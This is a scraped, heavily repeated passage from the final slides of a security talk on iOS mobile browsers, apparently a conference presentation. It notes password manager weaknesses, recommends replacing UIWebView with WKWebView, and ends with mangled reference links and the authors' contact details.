bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 74: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/74.jpg)
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 75: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/75.jpg)
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 76: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/76.jpg)
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 77: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/77.jpg)
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 78: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/78.jpg)
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 79: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/79.jpg)
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 80: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/80.jpg)
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 81: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/81.jpg)
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 82: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/82.jpg)
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS